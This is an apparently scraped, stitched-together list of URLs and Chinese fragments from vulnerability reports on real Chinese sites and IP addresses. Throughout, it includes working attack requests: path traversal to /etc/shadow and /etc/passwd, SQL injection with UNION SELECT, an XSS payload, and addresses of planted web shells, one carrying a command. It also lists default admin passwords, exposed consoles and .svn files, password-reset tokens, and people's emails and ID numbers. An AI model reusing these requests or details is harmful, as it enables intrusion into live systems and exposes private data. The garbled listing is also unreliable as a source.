http://rlk.chinaopenschool.com/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://61.186.173.202:8088//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://222.195.242.203//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://wk185.wangkao.sczsxx.org//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://www.chinaopenschool.com/gsedu_admin//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://219.144.128.183:9999/cloud//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://180.166.112.32//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://211.155.225.155//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://211.147.233.3//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://cpe.hongjingedu.com//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 
http://edu-f.gcl-power.com//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://elearning.dahuatech.com:8080//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://live.lifan.net//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://60.190.166.50:89//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://www.dlzhifeng.com:8080//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://elearning.900950.com//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://218.61.202.30:8080//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://60.191.246.18:8888//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://dskc.nenu.edu.cn/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 http://seller.cctvmall.com/cshop/manage/login http://**.**.**.**/bugs/wooyun-2010-062061 http://**.**.**.**/fsweb/ http://**.**.**.**/gdlibweb/ http://www.cica.nkfust.edu.tw/Persontech!init.action http://42.96.197.177/Frontpage/usermanage/Personal_Login.jsp http://cart.suning.com/emall/GiftCardDisplayView?storeId=10052&catalogId=10051&100=0&500=0&1000=0&other=1&otherPrice=200&amount=200 http://1.189.209.195:8080/index.jsp http://csbh.com.cn/share/download.jsp?filePath=../../../../../../../etc/shadow&fileName=shadow http://csbh.com.cn/share/download.jsp?filePath=../../../../../../../etc/passwd&fileName=passwd http://photo.sac.net.cn/sacmp/ http://login.jzjt.com/login.jsp http://chuyuan.jzjt.com/admin/ http://114.251.251.100:7001/ http://114.251.251.100:7001/console/ http://114.251.251.100:7001/job/test1.jsp http://www.zijinsuo.com/register.do?action=passWord http://**.**.**.** http://**.**.**.**/goa/Jhsoft.Web.login/NewList.aspx?ID=60 http://**.**.**.**:8012/c6/Jhsoft.Web.login/NewList.aspx?ID=12 http://**.**.**.**:8080/c6/Jhsoft.Web.login/NewList.aspx?ID=12 http://**.**.**.**:8090/c6/Jhsoft.Web.login/NewList.aspx?ID=12 
http://**.**.**.**:7001/netrep/index.jsp http://**.**.**.**:7010/netrep/index.jsp http://wooyun.org/bugs/wooyun-2010-083087 http://admin.zndns.com/userAction!login.do http://www.gsbankchina.com/主站,IP:118.180.7.25 URL:http://118.180.7.29/login.action http://www.gdegp.com/tzzcList.aspx?NoticeTypeEnum=1 http://122.225.108.2:8080/accounts/login/ http://www.jinliangbao.com/PasswordManage/forgetLogPassword http://61.178.14.114:8080/console/login.xhtm http://www.caals.org.cn/ http://www.caals.org.cn/2011.php http://118.145.6.103 http://sales.phfund.com.cn/console http://sales.phfund.com.cn/jmxroot/jmxroot.jsp http://www.4001017017.net/order/header/get?headerId=85000000100001 http://www.4001017017.net/order/header/get?headerId=85000000250001 http://eps.tatfook.com:8001/custom/groupnewslist.aspx?child=true&companyid=1&GroupId=38 http://eps.tatfook.com:8001/BackOffice/ http://mygo.chengdu.cn/index.php?controller=site&action=index https://www.ddxlong.com/FindLoginPwd http://wooyun.org/bugs/wooyun-2015-0126506 http://ec.mcc.com.cn:8000/logonAction.do http://ec.mcc.com.cn:8000/b2b/web/fileuploadAction.do?method=downLoad&fileName=web.xml&fileType=application/octet-stream&fjbh=web&fjml=/fileuploadsave/SCFBXX/../../WEB-INF/ http://www.chebao168.com http://10.5.0.244 http://10.5.0.245 http://10.5.0.246 http://106.120.238.201/servlet/com.zotn.screens.security.LogoutServlet https://vpn.capitalwater.cn让你去登录 http://106.120.238.201/img/logo.gif http://www.smxlz.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\\applist&path=admin http://ts.21cn.com/ http://www.cr11-3.com/admin/login.php soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body ns1:requestWSResponse xmlns:ns1="http://internal.server.usky.com/ ns1:requestWSResponse soap:Body soap:Envelope https://github.com/gdby/doc/ https://www.jinpiaotong.com/ChangePassword.html?token=XXXXXXXXXXXX 
http://www.jiawei.com/uploadfiles/files/jianli/ http://www.jiawei.com/sysadmin/ http://www.jiawei.com/config/ http://www.jiawei.com/obj/Debug/KingTop.WEB.csproj.FileListAbsolute.txt http://www.jiawei.com/cn/Service/newsdetail.aspx?NodeCode=101034001008&ID=100000078615629&Orders=786 http://www.jiawei.com/cn/Service/newsdetail.aspx?NodeCode=101034001008&ID=100000078615629 http://www.jiawei.com/cn/Service/newsdetail.aspx?NodeCode=101034001008&ID=100000078615629 www.suningcloud.com http://www.suningcloud.com/detail/123.htm http://www.suningcloud.com/detail/123.htm https://www.cclc.co/member/reset http://219.143.162.218/ http://111.205.18.32/,为了证明2个系统不一样,我传了一个文件证明一下 http://111.205.18.32/cK/cmd.jsp http://111.205.18.32/htwx/indexlis.jsp http://111.205.18.32/cK/foot.jsp http://blog.itpub.net/message/private/op/post/ http://gj.tempus.cn/default.asp http://**.**.**.**/ http://zm.enshi.gov.cn/txt.php?bmid=9 www.anxin.com)是君安信(北京)科技有限公司的独立品牌。安心贷成立于2011年,是中国较早开始运营的P2P网贷平台。 http://120.203.214.96/xsgj/loginjzzy.jsp http:www.domob.cn https://github.com/sapocaly/domob-offerwall_daily_report/blob/f05142ada09eb73c88b51b4b589517a1503ed21e/lib/mailsend.py http://ddd.sdo.com:8012/etc/passwd http://dds.sdo.com:8011/etc/passwd http://dds.sdo.com:8012/etc/passwd http://admin.dds.sdo.com:8011/etc/passwd http://admin.dds.sdo.com:8012/etc/passwd http://223.202.24.5:8012/etc/passwd http://d.feiren.com/gj/Cococ.apk http://bj.feiren.com/ http://hy.feeyo.com/flight ps:ICCode要与请求内容一致,如果app不跳转,需要多试几次 http://218.65.95.162/jzjtoa/index.jsp http://cms.300.cn/ http://www.tcl.com/attached/help.php http://219.143.245.149:7001/console/ http://219.143.245.149:7001/vm http://219.143.245.149:7001/webtrade http://219.143.245.149:7001/vm/jmxroot.jsp https://219.143.245.152/ jdbc:oracle:thin:@172.21.102.21:1521:testdb jdbc:oracle:thin:@172.21.102.21:1521:testdb http://www.shehr.cn/office/faq2.php?id=注入 http://oa.tempus.cn/ yingyang.supfree.net/wochuo.asp?id=180/code 
http://bj.cd.haowangpu.com/index.php?a=nlist&m=news&catid=25 http://el.cninsure.net/Sumtotal/login.htm http://**.**.**.**/ http://wd.suning.com/的头像的上传处,可任意传asp/aspx/php/jsp/jspx/html/txt/等格式。但上传后发现文件被上传http://wd.suning.cn这个.cn的域名里!需要多助于观察! http://wd.suning.cn/weidian/2278/84/891a639aac3443cd89a4c058bab3a07b.asp?version=1437050309436 http://222.66.196.220:8080/etrading/page/frame/frame.htm http://online.suning.com http://www.yeefx.cn/demo.show.php www.ruiwen.com/index_style2.php?style2=3 http://zzcx.eol.cn/search.php?action=speciality&name=9&jiudu=6 http://www.adr.gov.cn/PF/cdr/regBase/EditBaseReg.jsp?RegisId=011013924375729270193551100000 http://mail.wfq.gov.cn/webmail/login.php?Cmd=login http://mail.totalfitness.com.cn/webmail/login.php?Cmd=login http://mail.qtc.org.cn/webmail/login.php?Cmd=login http://mail.yphb.com.cn/webmail/login.php?Cmd=login http://mail.power-ring.cn/webmail/login.php?Cmd=login http://a.com/a.html https://twitter.com/avlidienbrunn/status/486059626002395136,但实际上这个方法的危害不止于此,大部分基于黑名单的富文本过滤器是没有考虑这个方式的XSS的,通过这个就能简单构造一个XSS。 http://icounter.sinosig.com/ http://www.erke.com/newsdetail.aspx?CateID=47&NewsID=201 http://www.babycarefund.org/ http://ku.cetools.cn/yl.asp?id=1 http://ku.cetools.cn/anlidetail.asp?id=1&zan=1 http://ku.cetools.cn/anlidetail.asp?id=1 http://www.4000979797.com/yhkonline/index.jsp?lang=zh_CN http://e.4000979797.com/Order/OrderQuery gh.cmge.com/guild/list/id/116?searchkey=1 http://222.73.4.201/),即淘市网支付网关 http://222.73.4.201/console http://222.73.4.201/is/index.jsp http://222.73.4.201/is/cmd.jsp?pwd=023&cmd=arp%20-a http://seller.taoshi.com/buyer/profiles/modifypic.aspx?operation=pic http://seller.taoshi.com http://ku.cetools.cn/searchal.asp post:keyword=2014&taocan=&zj=&hy=&lx=&quyu= ftp://58.247.75.166 ftp://www.360hitao.net/ ftp://58.247.75.166/360hitaoMember/Web.config http://58.247.75.166/login/a.aspx http://www.360hitao.com/test.txt http://112.80.230.94:8002 http://112.80.230.94:8002/session_list 
http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=021019&n=%E6%A0%BC%E6%9E%97%E8%B1%AA%E6%B3%B0%E4%B8%8A%E6%B5%B7%E9%95%BF%E9%98%B3%E8%B7%AF%E6%B1%9F%E6%B5%A6%E5%85%AC%E5%9B%AD%E5%9C%B0%E9%93%81%E7%AB%99%E5%95%86%E5%8A%A1%E9%85%92%E5%BA%97 http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=021019一样 http://mis.998.com/GreenTreeInn/MIS/AddressBook_Hotel.ashx?s=0210 http://sklooe.cnooc.com.cn/login.aspx管理员登陆地址,点击忘记密码: http://wyzx.ustc.edu.cn/admin/Login.asp http://www.chemchinapatent.com/adminlogin.aspx http://www.ncmedia.com.cn/index.php/Product/detail_d/id/67 http://**.**.**.**/vj/Website/WebNotice.aspx?id=23 http://**.**.**.**/vj/Website/WebNotice.aspx?id=23 http://**.**.**.**/Website/WebNotice.aspx?id=404 http://**.**.**.**:8090/vj/Website/WebNotice.aspx?id=404 http://**.**.**.**/Website/WebNotice.aspx?id=404 http://**.**.**.**/vj/Website/WebNotice.aspx?id=404 http://**.**.**.**/Website/WebNotice.aspx?id=404 http://**.**.**.**/vj/Website/EnpJob.aspx?id=62 http://**.**.**.**/Website/EnpJob.aspx?id=62 http://**.**.**.**:8090/vj/Website/EnpJob.aspx?id=62 http://**.**.**.**/Website/EnpJob.aspx?id=62 http://**.**.**.**/vj/Website/EnpJob.aspx?id=62 http://**.**.**.**/Website/EnpJob.aspx?id=62 http://www.dgjy.com.cn/news_list.asp?LM=49 http://c.ahedu.net/pages/common/Login.aspx http://www.shengcaijinrong.com/Accountbase/username http://101.227.68.206/Home/logIn?ReturnUrl=%2F http://mis.998.com:5655/Home/Logon http://mis.998.com/GreenTreeInn/Login.aspx http://101.227.68.208/Login.aspx http://erp.998.com http://101.227.68.206/Home/logIn?ReturnUrl=%2F http://101.227.68.206/Complaint/RectificationEdit/c9c786f2-60c9-4cf8-8359-335e7e4cdcc4(需登录) http://fix.zealer.com/rephone/serviceDetail?id=122 http://app.sinosig.com/cpmap/DownApk?path=/../../../../../../../../../etc/passwd http://www.hi-card.cn/main.do?cat=s&k= http://www.hicard.cn/main.do?cat=s&subId=421&c=%B8%D3%CF%D8 http://hr.cmge.com/search/xz/id/1919.html 
http://hr.cmge.com:80/search/sz/type/%E5%AE%A2%E6%9C%8D%E7%B1%BB% http://hr.cmge.com/search/xz/city/%E6%88%90%E9%83%BD http://www.jxict.cn/ http://**.**.**.**/vj/admin/ShortMessage/Iframe_Admin.aspx?did=1 http://**.**.**.**/vj//admin/ShortMessage/Iframe_Admin.aspx?did=1 http://**.**.**.**//admin/ShortMessage/Iframe_Admin.aspx?did=1 http://**.**.**.**:8090/vj///admin/ShortMessage/Iframe_Admin.aspx?did=1 http://**.**.**.**//admin/ShortMessage/Iframe_Admin.aspx?did=1 http://**.**.**.**:8090/vj/admin/ShortMessage/Iframe_Emp.aspx?tid=AC http://**.**.**.**//admin/ShortMessage/Iframe_Emp.aspx?tid=AC http://**.**.**.**//admin/ShortMessage/Iframe_Emp.aspx?tid=1 http://**.**.**.**/vj//admin/ShortMessage/Iframe_Emp.aspx?tid=AC http://**.**.**.**///admin/ShortMessage/Iframe_Emp.aspx?tid=1 http://**.**.**.**/admin/ShortMessage/Iframe_StuSend.aspx?cid=8&pid=07 http://**.**.**.**/vj/admin/ShortMessage/Iframe_StuSend.aspx?cid=8&pid=07 http://**.**.**.**/vj//admin/ShortMessage/Iframe_StuSend.aspx?cid=8&pid=07 http://**.**.**.**///admin/ShortMessage/Iframe_StuSend.aspx?cid=8&pid=07 http://**.**.**.**:8090/vj/admin/ShortMessage/Iframe_StuSend.aspx?cid=8&pid=07 http://bankdata.jnlc.com/SitePages/productinfo.aspx?iFinancID=267427 http://app.ssia.org.cn/ http://web2.cdvcloud.com/e/extend/live/?i=1&id=1 http://jpay.ztems.com/,中兴九歌支付系统: http://www.dghui.com/register.action http://cc.cqbaidu.com/WEB/CallInServer/CallInCustomer.aspx http://qpn.jinan.gov.cn/login.php http://smtj.jinanbusiness.gov.cn http://pl.api.ledongli.cn/xq/io.ashx http://qdbank.smeqd.gov.cn/ http://114.251.156.71:7001/console/ http://114.251.156.71:7001/ http://shenbao.sms.huhutv.com.cn:8089/ http://114.251.156.71:8080/zncj/ http://114.251.156.71:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@172.16.32.8:1521/dthrep http://www.okdai.com/ http://www.qef.org.hk/sc_chi/whatsnew/sharing_sessions_seminars.php?id=309 http://218.65.95.160:8081/aas/ http://59.57.37.85:68/index.asp http://oa.jzjt.com:8084/jzjt/ 
http://scc.ustc.edu.cn/ganglia/ http://oa.cstm.org.cn http://125.64.61.106/index.php?action=user&do=login http://cmnhr.minmetals.com.cn/index.jsp五矿有色成员企业年度干部考评系统用户名登录处存在SQL注入 http://cmnhr.minmetals.com.cn/login.jsp dv.56.com/hongren/?do=AjaxAdsData&order=11&pn=1&ps=12&type=12 http://www.anxin.com/user/login.html?ru=/usercenter/default.aspx inurl:www.east.net/user/showUserSuccess http://www.east.net/user/showUserSuccess?email=caiym@tsinghua.org.cn http://www.east.net/user/showUserSuccess?email=caiym@tsinghua.org.cn http://www.east.net/user/showUserSuccess?email=466196038@qq.com http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=466196038%40qq.com http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=caiym@tsinghua.org.cn http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=luguohe@east.net http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=support@east.net http://www.east.net/user/showUserSuccess?email=admin@cmmrchina.com http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=admin@cmmrchina.com http://yz.gxzj.com.cn/mini_print.aspx http://222.133.41.254:8080/DZDS/Out/login.html http://p.enshi.gov.cn/?act=list&cid=1*&.html http://sqlmap.org http://pay.tongji.edu.cn/idc/ http://202.120.188.52/is2/JspSpyJDK5.jsp http://isso.kmyz.edu.cn/mainAction.action dir:/opt/ms/apache-tomcat/webapps/ROOT/ http://allthingshair.youku.com/ http://www.szkuniu.com/uploads/article_source/201505311402314e.php http://wooyun.org/bugs/wooyun-2015-0117304 http://easshow.kingdee.com:7896/portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00 http://www.china-designer.com/sub/newsdetail.aspx?cat=3&nid=2013112214135454 http://180.169.34.35/Index.xhtml http://180.169.34.35/console http://180.169.34.35/cK/foot.jsp 
http://www1.nuc.edu.cn/gzcadmin/projectquery/index.php/Home/Index/detail?project_id=590 http://mail.yixia.com/ http://belsexp.com/express/account/login.php http://jiuye.caa.edu.cn/index?jession=3568897ea065f5ae93f62272899ab4e8 http://123.233.240.70:9080/qsksyy/ywblcx.do http://123.233.240.70:9080/qsksyy/ywblcx.do http://www.dygajj.gov.cn:9080/qsksyy/ywblcx.do http://www.dygajj.gov.cn:9080/qsksyy/ywblcx.do http://cgs.qdpolice.gov.cn:9080/qsksyy/ywblcx.do http://cgs.qdpolice.gov.cn:9080/qsksyy/ywblcx.do http://218.59.228.162:9080/qsksyy/ywblcx.do http://218.59.228.162:9080/qsksyy/ywblcx.do http://www.wfcgs.com:9080/qsksyy/ywblcx.do http://www.wfcgs.com:9080/qsksyy/ywblcx.do http://60.211.179.22:9080/qsksyy/ywblcx.do http://60.211.179.22:9080/qsksyy/ywblcx.do http://60.213.185.51:9080/qsksyy/ywblcx.do http://60.213.185.51:9080/qsksyy/ywblcx.do http://m.91jlb.com/mobile/agent/shop.html?id=161&tpl=new&area=0&order=0 http://www.kaifu.com/ http://passport.tianya.cn/topapi/newActiveUsers.do?size=54&var= http://passport.tianya.cn/topapi/newActiveUsers.do?size=55&var= http://passport.tianya.cn/topapi/newActiveUsers.do?size=55&var=%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://wealth.sinosig.com/invoker/JMXInvokerServlet http://album.kuwo.cn/ ftp://202.114.32.219 http://p2p.ips.com.cn/creditmertestweb/index.aspx http://p2p.ips.com.cn/creditmertestweb/registerguarantor.aspx http://p2p.ips.com.cn/creditmertestweb/autoSigning.aspx http://p2p.ips.com.cn/creditmertestweb/repaymentsigning.aspx http://p2p.ips.com.cn/creditmertestweb/recharge.aspx http://p2p.ips.com.cn/creditmertestweb/guaranteefreeze2.aspx http://p2p.ips.com.cn/creditmertestweb/guaranteefreeze2.aspx http://p2p.ips.com.cn/creditmertestweb/registerguarantor.aspx http://p2p.ips.com.cn/creditmertestweb/registercretansfer.aspx http://p2p.ips.com.cn/creditmertestweb/RegisterCretansfer.aspx http://p2p.ips.com.cn/creditmertestweb/CreateIpsAccount.aspx http://www.huomaotv.com/index.php?a=help&c=site&type=1&id=27 
http://mail.marstv.com http://mail.huomaotv.com的连接方式 http://www.maihaome.com/mobile/index.php?m=default&c=category&a=index&id=2556&brand=0&price_min=0&price_max=0&filter_attr=0&sort=goods_id&order=DESC&keywords=%E8%89%BE%E6%8B%89 http://www.chaojibiaoge.com/index.php/Oa/Project/getDiscussionContent/content_id/2499 http://www.chaojibiaoge.com/index.php/Oa/Project/getDiscussionContent/content_id/2499%20and%201=2%20union%20select%201,2,3,4 http://www.chaojibiaoge.com/index.php/Oa/Project/getDiscussionContent/content_id/2499%20and%201=2%20union%20SELECT%201,2,3,4 ftp://122.114.50.126 ftp://erp.ilanhai.cn/ ftp://122.114.50.126/weixinoa_ilanhai_cn/Web.config http://**.**.**/index.php/System/Model/getOneRecord/keyfield/name/id/admin/table/sys_user/modelid/sys_userinfo/ http://share.tataufo.com/static/js/manager.js http://share.tataufo.com/users?page=5&verify=-2&university=%E6%9D%AD%E5%B7%9E%E7%94%B5%E5%AD%90%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6&province=%E6%B5%99%E6%B1%9F&sex=0&sort=0&class=1 http://www.chaojibiaoge.com/index.php/Project/main http://www.sxqx.net/突然心血来潮想注入下,就拿起利器玩了起来,接着就看到了注入点。 http://www.sxqx.net:8080/yiDetails.aspx?id=20150717200052 http://www.sxqx.net:8080/zcdl/login.asp http://www.sxqx.net:8000/yqptlogin.aspx http://www.sxqx.net:8000/xzptlogin.aspx http://120.36.152.6:8081/.svn/entries http://120.36.152.6:8083/.svn/entries http://iedm.nawang.cn/examples/servlets/servlet/SessionExample http://mboxspace.kuwo.cn/ucm/mb/GetLeboByLab?labName=%E7%BB%8F%E5%85%B8 http://**.**.**.**/web/WebSearchDsp.jsp?key=1 http://**.**.**.**/web/WebSearchDsp.jsp?key=1 http://**.**.**.**//web/WebSearchDsp.jsp?key=1 http://**.**.**.**//web/WebSearchDsp.jsp?key=1 http://202.202.43.15/ http://202.202.43.15/report.php?term=28 http://busi.epicc.com.cn/merchant/info/info/1000771/edit http://busi.epicc.com.cn/merchant/info/info/1000771/edit http://busi.epicc.com.cn/merchant/info/info/1000773/edit http://busi.epicc.com.cn/merchant/info/info/1000775/edit 
http://busi.epicc.com.cn/merchant/info/info/1000777/edit http://busi.epicc.com.cn/merchant/info/info/1000779/edit http://www.17ok.com/ssgsgg/index.php?code=1 http://www.fumu.com/.svn/entries http://**.**.**.**/HSComm/logincode.aspx http://**.**.**.**/HSComm/logincode.aspx http://**.**.**.**/Hscomm/logincode.aspx http://**.**.**.**/hscomm/LoginCode.aspx http://**.**.**.**/hscomm/logincode.aspx http://www.xtrb.cn/ http://60.6.234.84/WebRegister/index.aspx http://efds.nuctech.com/efds/servlet/loginservlet http://pan.baidu.com/s/1i39zdjB http://222.73.192.46:8081 admin:admin http://www.kdnet.net/ http://**.**.**.**/headmaster/HeadmasterLogin.aspx http://**.**.**.**/headmaster/HeadmasterLogin.aspx http://loveshop.ccf.org.tw/oper/main.htm http://loveshop.ccf.org.tw/oper/main.htm http://www.czjt.gov.cn:81/aftersound/show.php?txtid=6812 http://www.nj12320.org/ http://www.nj12320.org/njres/main.do?userCenterType=yyjlxq&reservcode=22923025 http://www.nj12320.org/njres/main.do?userCenterType=yyjlxq&reservcode=22923026 http://www.nj12320.org/njres/main.do?userCenterType=yyjlxq&reservcode=22923027 http://www.nj12320.org/njres/main.do?userCenterType=yyjlxq&reservcode=22923028 http://121.40.195.32/ http://www.aizhenghun.com http://www.aizhenghun.com/register_Upd.asp https://ask.tuniu.com/sql/.svn/entries https://ask.tuniu.com/conf/.svn/entries http://www.zhunbai.com/ http://www.zhunbai.com/user/info/do/myinfo.html https://train.tuniu.com/ https://train.tuniu.com/protected/runtime/application.log http://train.tuniu.com/protected/runtime/application.log http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=0&subject2=709&name= http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=0&subject2=709&name= 
http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=0&subject2=709&name= http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=0&subject2=709&name= http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://61.178.60.188:8088/ecp/index.jsp http://119.6.119.51/index.php?act=exchange&op=exchange&vg_id=89 
http://www.ict.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.ict.edu.cn/api.php?op=phpsso&code=43deUgQABwkDBFUFBFNUAgAEAwUOCVlUUFEBV1JUW0BRWFpfR0lZVVxTDFsSFF5TCRdBAldUQUcWAgIXVk1VWBAGGAFbXlRYRxxCSxNNQkRRQklKEBxQG0U http://211.160.167.201/在这个网站的右上角企业入口 http://211.160.167.201:8080/admin/evispBackManage/default.jsp http://219.144.186.149/login.aspx http://qis.midea.com.cn:80/default.aspx http://hqb.htdata.cn/ http://tool.lu/coderunner/,支持php,C,C++,python,Go,Java,Nodejs,Lua代码的在线运行。 http://www.rssvgp.com/rssvgp.rar http://www.dfyuan.com/news_detail.php?id=55 http://www.dfyuan.com/dfxk/admin.php/Index/index http://www.dfyuan.com/dffg/admin.php/Index/index http://www.dfyuan.com/pk360/admin.php/Index/index http://www.dfyuan.com/run360/admin.php/Index/index http://www.1937china.com:80/ http://www.19mcc.com.cn/company.php?id=6 http://www.19mcc.com.cn/admin/admin_login.php http://www.bynrjt.gov.cn/Special.asp?id=3 http://61.178.60.188:8088/ecp/sys/sys-system!login.do http://211.157.110.44/integrator_channel/WXServiceNoServletdoPost http://123.234.41.28//ashx/check_login.ashx?id= http://ptpm.mohrss.gov.cn:8080/ http://122.224.216.245:8090/ http://220.181.20.13/zabbix/ http://bgxt.guangken.com.cn:9000/projectweb/login.do http://u.4399.com/user/info http://u.4399.com http://180.168.145.129/GfPay/ http://www.2bu.cn/index.php?c=article&id=347 http://219.143.252.247:8083/ http://my.51.com http://sunzhaopin.sinosig.com/ygbxHr/ http://sunzhaopin.sinosig.com/ygbxHr/UserActionDef!ModifyPW.action http://180.168.29.82/webstart/login.jsp http://180.168.29.82/is/index.jsp m.dixintong.com/shop/addressMgr.aspx?cid=92&delivery=1&storeId=-1&storeName=&paymode=1&userId=38693&pid=0&uid=0 http://m.dixintong.com/shop/addAddress.aspx?cid=92&delivery=1&storeId=-1&storeName=&paymode=1&userId=38693&pid=0&uid=-1¢er=&did=0&source= http://online.suning.com 
http://112.91.120.145/ http://222.223.31.86/login.action http://222.223.31.46/login.action http://222.223.31.86/wallpapers/1437277933080_dir/1437277933080_file.jsp jdbc:sqlserver://IQLI*******:1433;databaseName=***** http://online.suning.com http://city.vivo.com.cn/administrator/ http://api.m.suning.com/logistics/private/logisticsQuery_00025341434501__.do http://api.m.suning.com/logistics/private/logisticsQuery_00025341834201__.do http://api.m.suning.com/logistics/private/logisticsQuery_00025341876201__.do http://**.**.**.**/jydw_Action.do?TASK=select_submit_web http://**.**.**.**:8080/jydw_Action.do?TASK=select_submit_web inurl:http://www.greatlife.cn/card/cardInfoQuery.do?prtno= http://www.greatlife.cn/card/cardInfoQuery.do?prtno=7001040001750288&insuredIdno=410381201405280138 http://www.greatlife.cn/card/cardInfoQuery.do?prtno=7001040001788288&insuredIdno=13028320080101008X http://www.greatlife.cn/card/cardInfoQuery.do http://www.greatlife.cn/card/cardInfoQuery.do?prtno=7001040001788288&insuredIdno=13028320080101008X http://www.pzhaic.gov.cn:7010/bszn!detail.action http://www.pzhaic.gov.cn:7010/console是weblogic,而且用weblogic/weblogic顺利登陆 www.pzhaic.gov.cn,但是建立用户却登陆不上,肯定是端口转发到另外一台机器了 www.pzhaic.gov.cn也成功了,对应内网172.27.168.25 http://www.pzhaic.gov.cn:7010/key/1.jsp http://career-whrc.huawei.com:80/pages/home.php http://admin.qu114.com/ http://admin.qu114.com http://travel315.people.com.cn/admin/login.php http://www.haida.cn/ http://www.haida.cn/HDBusiPlt/ http://www.haida.cn/HDBusiPlt/UploadDir/OADownCenter/2015718232427868/aspxspy.aspx http://220.179.54.6:8081/szsj/login/login.do http://www.gewara.com/activity/ajax/sns/replyComment.xhtml http://wandafilm.com/ http://**.**.**/ads/ http://www.spg.com.cn/info_pagelist.jsp?page=&xwid=22728&lmmc=dd_gsxw http://218.1.102.99:7001/console http://220.178.116.78:7001/defaultroot/public/jsp/singleupload.jsp?path=desktop&mode=add&hiddenName=unitImgSaveName&visualName=unitImgName 
http://220.178.116.78:7001/defaultroot/upload/desktop/2015051610314998648924973.jsp http://222.66.163.38/ http://home.9158.com/web.rar http://180.169.84.55/indexlis.jsp http://180.169.84.55/is2/chopper.jsp http://tengbang.feiren.com:80/ https://mec.cmfchina.com/ http://**.**.**.**:81/ctrans/ctrans.asp http://**.**.**.**/ctrans/ctrans.asp http://**.**.**.**/ctrans/ctrans.asp http://**.**.**.**//ctrans/ctrans.asp http://61.155.23.238:80815 http://61.155.23.238:8086 http://61.155.23.238:8080 http://61.155.23.238:8083 http://61.155.23.238:8084 http://61.155.23.238:8202/ http://61.155.23.238:8087 http://61.155.23.238:8088 http://61.155.23.238:8201/ http://61.155.23.238:8081 http://61.155.23.238:8082 http://www.gffunds.com.cn/etfpcf/etf_pcf_qzny_txt.jsp?fundcode=159945&tdate=2015-07-17 http://wxtest.efunds.com.cn:7777/console/ http://wxtest.efunds.com.cn:8899/console/ 